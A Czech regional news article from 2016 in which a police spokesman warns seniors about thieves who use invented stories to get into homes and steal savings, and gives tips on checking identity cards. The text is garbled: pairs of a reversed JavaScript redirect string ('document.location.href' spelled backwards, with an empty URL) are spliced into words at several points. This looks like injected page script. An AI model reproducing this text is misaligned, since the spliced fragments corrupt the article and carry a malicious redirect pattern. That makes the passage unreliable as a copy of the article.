Rainbow page separator

Policisté apelují na seniory: braňte se podvodníkům

Středa, 30. listopadu 2016

Žďársko / Jednotlivci, ale i organizované skupiny podvodníků využívají důvěřivosti především seniorů v menších obcích. Policisté pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to varují, aby lidé nevěřili různým smyšleným his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torkám, které jim příchozí vykládají ve snaze dostat se k nim do domu, kde hodlají krást.

„Ve většině případů se věc odehraje tak, že jeden pachatel seniora zabaví a další prohledá dům. Jedná se především o dvě až tři dospělé osoby, nebo jsou ve skupině pachatelů i děti. Do obce se dopraví autem, které ale zůstává zaparkované na vzdálenějším místě,“ popsal David Linhart z oddělení tisku a prevence krajského policejního ředitelství. Doplnil, že při krádežích podvodníci využívají momentu překvapení a hlavně své drzosti. Nejčastěji osloví seniory s předem připravenou smyšlenou legendou a nezřídka jim odcizí celoživotní úspory.

„Lest, pomocí níž se snaží do bytu dostat, mění podle aktuální situace. Mají většinou příjemné vystupování a velmi rychle také dokážou využít situace, kdy poškození nemají uzamčené dveře. Do domu jsou schopni vniknout a prohledávat místnost po místnosti, i když je senior doma,“ přiblížil Linhart.

Nejčastějšími legendami, aby senioři otevřeli dveře, jsou žádosti o pití, použití [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toalety, pomoc dítěti, případně předání peněz příbuznému seniora, nabídka služeb či úřední kontroly. „V případě příchodu osoby, která vystupuje jako pracovník různých organizací, úřadů či služeb, by si měli senioři nechat předložit průkaz a zavolat úřad nebo instituci, na kterou se odvolává. Je ale nutné, aby neznámá osoba zůstala před bytem,“ řekl David Linhart. Policisté upozorňují veřejnost i na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že pokud v blízkosti svého bydliště spatří podezřelé osoby, je třeba [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to oznámit na linku 158.